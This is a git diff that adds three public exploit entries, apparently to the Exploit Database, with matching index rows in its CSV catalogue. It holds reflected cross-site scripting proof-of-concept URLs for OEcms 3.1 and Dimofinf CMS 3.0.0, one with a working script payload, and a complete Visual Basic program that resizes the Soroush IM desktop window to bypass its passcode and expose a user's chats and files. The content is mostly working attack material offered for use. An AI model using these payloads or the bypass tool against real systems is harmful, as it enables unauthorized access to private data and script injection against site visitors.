diff --git a/exploits/php/webapps/44895.txt b/exploits/php/webapps/44895.txt new file mode 100644 index 000000000..a80fa282c --- /dev/null +++ b/exploits/php/webapps/44895.txt @@ -0,0 +1,13 @@ +# Title: OEcms 3.1 - Cross-Site Scripting +# Author: Felipe "Renzi" Gabriel +# Date: 2018-06-15 +# Software: OEcms v3.1 +# CVE: CVE-2018-12095 + +# Technical Details & Description: +# A Reflected Cross-Site Scripting web vulnerability has been discovered in the "OEcms v3.1" web-application. +# The vulnerability is located in the 'mod' parameter of the`info.php` action GET method request. + +# PoC + +http://Target/cms/info.php?mod=list" \ No newline at end of file diff --git a/exploits/php/webapps/44897.txt b/exploits/php/webapps/44897.txt new file mode 100644 index 000000000..a17a79553 --- /dev/null +++ b/exploits/php/webapps/44897.txt @@ -0,0 +1,11 @@ +# Title: Dimofinf CMS 3.0.0 - Cross-Site Scripting +# Author: Felipe "Renzi" Gabriel +# Date: 2018-06-13 +# Software: Dimofinf CMS Version 3.0.0 +# CVE: CVE-2018-12094 + +# A Reflected Cross-Site Scripting web vulnerability has been discovered in the "Dimofinf CMS" web-application. +# The vulnerability is located in the 'id' parameter of the`news.php` action GET method request. + +# PoC +http://Target/news.php?id=604""</|\><plaintext/onmouseover=prompt(/XSS/)> \ No newline at end of file diff --git a/exploits/windows/local/44896.vb b/exploits/windows/local/44896.vb new file mode 100644 index 000000000..ad79cb650 --- /dev/null +++ b/exploits/windows/local/44896.vb @@ -0,0 +1,65 @@ +# Exploit Title: Soroush IM Desktop app 0.15 - Authentication Bypass +# Date: 2018-06-13 +# Exploit Author: VortexNeoX64 +# Vendor Homepage: https://soroush-app.ir +# Software Link: https://soroush-app.ir/UploadedData/Soroush.exe +# Version: 0.15 BETA +# Tested on: Windows 10 1803 + +# Security Issue: +# Attackers can unlock the client app installed on Windows OS(others?) without the passcode +# and access to all the files, chats, images, and etc. +# the attacker can then send, receive message of any kind on the behalf of the authorized user. + +# PoC (.NET 4.0 Visual Basic) + +''make sure before running this exploit the Soroush Messager window is NOT minimized +''adding InteropServices for DLLImport +Imports System.Runtime.InteropServices +Module Module1 + +''FindWindow API from user32.dll to get the window handler by lpWindowName + <DllImport("user32.dll", SetLastError:=True)> + Private Function FindWindow(lpClassName As String, lpWindowName As String) As IntPtr + End Function +''MoveWindow API from user32.dll to move and resize the window to trigger the bypass process + <DllImport("user32.dll", SetLastError:=True)> Private Function MoveWindow(hWnd As IntPtr, X As Integer, Y As Integer, + nWidth As Integer, nHeight As Integer, bRepaint As Boolean) As Boolean + End Function + Sub Main() + Try + Console.WriteLine("<<<<<Soroush IM Desktop GUI misbehaviour leads to passcode bypass>>>>> ") + Console.WriteLine("****** Developer: NeoVortex") + Console.WriteLine("****** Client Version 0.15 BETA") + Console.WriteLine("****** Tested on windows 10 1803") + Console.WriteLine("[****] Make sure the Messager windows is not minimized ") + Console.WriteLine("[Press any key to start the exploit...]") + Console.ReadKey() + Dim pss() As Process = Process.GetProcessesByName("Soroush") + Dim hWnd As IntPtr = FindWindow(Nothing, "Soroush") +'' check if the app is running + If (pss.Count > 0) Then + Console.WriteLine("[****] Process found with id: " & pss(0).Id) + Console.WriteLine("[****] Process File " & pss(0).MainModule.FileName) + Console.WriteLine("[****] Resizing to trigger the vulnerability.....") +'' move and resize the window + MoveWindow(hWnd, 100, 100, 100, 100, True) + Console.WriteLine("[****] Done") + Console.WriteLine("[****] Now close the Soroush messager windows via X button (NOT via system tray) , then reopen it ") + Console.WriteLine("[****] Passcode will be bypassed! ") +'' now you should close the exploit window and then close the Soroush messager window manually via X button(NOT FROM SYSTEM TRAY) because the Soroush messager window dose not support WM_CLOSE signal for the single window closing +''if anyone could close the GUI window without accually killing the app, he/she is welcome at gitub link below. + Else +''app is not ruuning + Console.WriteLine("[----]Process not found ") + End If + Console.ReadKey() + + Catch ex As Exception + Beep() + MsgBox(ex.Message, 16) + Console.ReadKey() + End Try + End Sub + +End Module \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 555276b74..dbf816cd4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9781,6 +9781,7 @@ id,file,description,date,author,type,platform,port 44888,exploits/windows/local/44888.txt,"Microsoft Windows 10 - Child Process Restriction Mitigation Bypass",2018-06-13,"Google Security Research",local,windows, 44889,exploits/linux/local/44889.rb,"glibc - 'realpath()' Privilege Escalation (Metasploit)",2018-06-13,Metasploit,local,linux, 44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows, +44896,exploits/windows/local/44896.vb,"Soroush IM Desktop app 0.15 - Authentication Bypass",2018-06-15,VortexNeoX64,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39554,3 +39555,5 @@ id,file,description,date,author,type,platform,port 44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php, 44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php, 44893,exploits/php/webapps/44893.php,"Joomla Component Ek rishta 2.10 - SQL Injection",2018-06-14,"Guilherme Assmann",webapps,php, +44895,exploits/php/webapps/44895.txt,"OEcms 3.1 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php, +44897,exploits/php/webapps/44897.txt,"Dimofinf CMS 3.0.0 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php,